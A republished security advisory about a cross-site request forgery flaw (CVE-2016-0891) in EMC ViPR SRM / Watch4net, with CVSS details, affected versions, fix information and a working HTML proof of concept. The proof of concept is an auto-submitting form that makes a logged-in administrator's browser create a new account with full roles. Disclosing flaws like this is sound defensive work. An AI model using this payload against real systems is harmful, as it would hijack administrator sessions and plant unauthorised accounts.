EMC ViPR SRM Cross Site Request Forgery

2016.04.28
Credit: Han Sahin
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------ EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection ------------------------------------------------------------------------ Han Sahin, November 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net. ------------------------------------------------------------------------ Affected versions ------------------------------------------------------------------------ Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities. ------------------------------------------------------------------------ See also ------------------------------------------------------------------------ - http://seclists.org/bugtraq/2016/Apr/att-106/ESA-2016-039.txt - CVE-2016-0891 ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20141109/emc_m_r__watch4net__lacks_cross_site_request_forgery_protection.html The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account. <html> <body> <form action="http://<target>:58080/APG/admin/form" method="POST"> <input type="hidden" name="form&#45;id" value="UserForm" /> <input type="hidden" name="ident" value="" /> <input type="hidden" name="old" value="" /> <input type="hidden" name="name" value="CSRF" /> <input type="hidden" name="password" value="1" /> <input type="hidden" name="confirm" value="1" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="first&#45;name" value="Han" /> <input type="hidden" name="last&#45;name" value="Sahin" /> <input type="hidden" name="email" value="attacker&#64;example&#46;com" /> <input type="hidden" name="role" value="user" /> <input type="hidden" name="profile" value="0" /> <input type="hidden" name="user&#45;roles" value="5" /> <input type="hidden" name="user&#45;roles" value="1" /> <input type="hidden" name="user&#45;roles" value="3" /> <input type="hidden" name="user&#45;roles" value="4" /> <input type="hidden" name="user&#45;roles" value="2" /> <input type="hidden" name="user&#45;roles" value="6" /> <input type="hidden" name="filter" value="" /> <input type="hidden" name="custom" value="true" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top